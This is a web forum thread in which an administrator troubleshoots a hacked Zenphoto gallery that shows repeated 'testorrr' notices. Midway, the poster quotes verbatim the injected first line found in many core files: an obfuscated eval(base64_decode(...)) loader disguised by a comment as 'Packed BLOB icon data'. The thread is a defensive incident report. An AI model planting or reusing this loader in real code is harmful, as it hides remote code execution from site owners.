I just heard from a client that a ZenPhoto gallery I installed for them a while back is suddenly displaying a whole lot of code, and when I checked it, I found this:
`
Notice: Undefined index: testorrr in /[path to web directory]/gallery/zp-core/lib-GD.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1
Notice: Undefined index: testorrr in /[path to web directory]/gallery/zp-core/lib-utf8.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1
Notice: Undefined index: testorrr in /[path to web directory]/gallery/zp-core/version.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1
`
And so on through a coupled of dozen more repetitions, each with different filenames listed (where "[path to web directory]" is the actual path to their web directory, which I've edited out for security reasons).
I've never seen anything quite like this, and have no idea what might be causing it. I upgraded the site to 1.2.4 back in May, but haven't done anything to it since, and it seemed fine after the upgrade. The client says they haven't changed anything, and no files appear to have been modified since May as far as I can see. My web host did move my account to a new server shortly after that, but I don't think that *should* have messed anything up, and in any event it was a month and a half ago and the client is only just reporting this problem now (though I don't actually know how often they check their gallery).
I checked some of the files that were triggering the error, and the string
"testorrr" doesn't seem to appear in any of them. I tried searching the gallery database for it and it wasn't in there either. I googled it, and mainly just found other broken sites displaying the same error. So I'm really kind of stuck...
Any ideas, anyone?
BTW, I tried disabling display of notices by adding `error_reporting(E_ALL ^ E_NOTICE);` to the top of index.php (as per
this page in the PHP manual), but it had no effect.
Zenphoto
Comments
Maybe check the permissions on files and folders, too.
I am guessing that some kind of change was made to the PHP configuration. The only `eval()` we do is in processing an image's EXIF/IPTC data, and then only on PHP5.
1. My web host says they have not made any PHP configuration changes recently,
2. Another ZenPhoto installation of the same version, on the same account, is not showing this problem at all, and
3. Most disturbing: when I saw sbillard's comment about only using eval() when processing the EXIF data, I thought "But I'm sure I saw it in the files I checked, and took another look. And every file that I checked had the following as the first line:
`<?php /*Packed BLOB icon data. Corruption may result script execution errors. Don't touch it unless you know what you are doing.*/ eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RhV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMlJoVjBad2IxbHJUbTloVm14WlZHMTRUMkZzU20xWGEyUlhZVzFKZVZWdGVFeFJNbEpvVmpCYWQySXhiSEpVYlRsb1ZtMTRXbFpITVRSVU1rWnpVMjB4V0dFeVVsaFpWekZLWlZaV2RHVkZlRkpOYkVwdlZtcENZV1F5U1hoaVNFcFZZbFJzYjFadE1UUlhiRnBJVFZSU1ZVMXJXbnBWTWpCNFYwZEZlVlZzYUZwV2VrWkxXbFphVjJSSFZrWmxSa3BPWWtWd01sWnRNWGRTTWsxNVZXNU9WV0pyY0ZsV2ExcGhWbFpXZEdSSVpGaFNiSEJaVkZaV01GWkZNVVZSYWxKV1RXcFdVRll5TVZkamF6VlhWVzFHVTJWcldsRlhhMXBoVkRKU1dGTnJXbXRTVkZaWVZXeFdWbVZHV25OV2JVWlZUV3RhTUZadGRHRmhiRXBIVjI1Q1ZtRXlVbFJWZWtaWFkxWktkRkp0Y0ZkaVdHaFlWakZvZDFVeGJGWk5WV2hRVmtaYVlWWnJWbmRqYkd4WFYydDBUMkpWVmpaWmExcHZZVlpLVlZaclZsZFNNMmh5VlRJeFYyTXhaSE5oUlRsWFlUQndlbFp0ZUZka01sWnpXa2hPVjJKWVVuRlVWVkpIVWpGUmVGVnNaRlppVlZvd1dsVldNRlpzV25SaFJWSmhVa1ZhY2xwRlpFdFRSVGxZWTBaT1RsSkZWWGxXYlhScVpVVTFTRkpZYUZOWFIzaG9WVEJXZDFkV1ZuSldiVVpUVW14d1YxWXllR0ZpUmtwelYycENWazF1VVhkV1J6RkxaRVp2ZW1KR2FHaE5helF3Vm0wd2VGTXlUWGxTYTJSV1lsZG9UMVJWVm5kbGJHUnlWV3M1VWsxck1UUlpNRlp2Vkd4YVdGVnVSbFZXVjJoVVZXeGFZVmRGTVZoU2JHUnBVbGhDVjFkWGRHRldNVmw1VWxob2FsSkdjR0ZaYkZKSFZFWlZkMVpVVmxkV2F6VXdWVzE0WVZSdFNrWmpTR3hYVjBoQ1NGWlVTbGRqTVZKWllVZHdVMkpZYUhaV1ZFSlhVekpPYzFadVNtaFNWR3hXVlcwMVEyVnNWbk5WYms1V1ZteFdOVlpITld0V1JURlhVMnBhVmxKck5YRlpNRll3VmxkT05rMUhOVXhWTW5NelNubHJjRTkzUFQwbktTazcnKSk7'));?>`
Then I checked my local copy of the ZP files, and voila, no such line in any of them! Checked the ZP installation - also no such line.
So this is starting to look disturbingly like a security breach of some sort. I'm going to change my SFTP password and any other passwords associated with the site, and re-upload the ZP files from my local copies - if anyone has any other suggestions, I'd be very thankful...
The weirdest thing is, the last-modified dates of the files are all still set to when I did the last upgrade! Nothing looks as though it's been changed recently. So if someone somehow got in and changed the files, they somehow did it without the modification dates changing, and I didn't think that was possible. :-(
But that indeed sounds like you got hacked. We do not know about security breaches in Zenphoto but of course that does not mean there might not still be some. But there are many possibilities like some custom JS used in your theme (I believe a custom one?) or simply via the server itself.
Anyway, if you find anything out let us know.
But I've alerted my host to this, and I'm hoping they can figure something out. In the meantime, I've archived the modified files and replaced them with clean copies, which seems to have fixed the problem.
I did find one other odd thing: in the site's root web directory (not the gallery directory), there were two files called favicon.ico and favicon.gif that I did not put there. Now, I know what favicon files normally are, but given that I didn't put them there, and they both had fairly recent last-modified dates - more recent than the last time I did anything with the site - I'm suspicious that they might actually be something else. I downloaded them and tried to force them to open in a text editor to see if they might actually contain some kind of code that was just disguised as an image file, but they both appear to be empty files of zero bytes.
I also tried to see if I could decode the block of base-64-encoded text in the eval statements by adding ob_start() before running it and ob_get_contents() to capture the buffer contents to a string, and then print the string, but that just got me a blank page. Not sure if I did something wrong - I'm reasonably conversant with PHP, but I haven't got much experience with the output buffer functions.
In case anyone else should happen to run into this particular problem, there are some details available here: http://www.zen-cart.com/forum/showthread.php?p=768035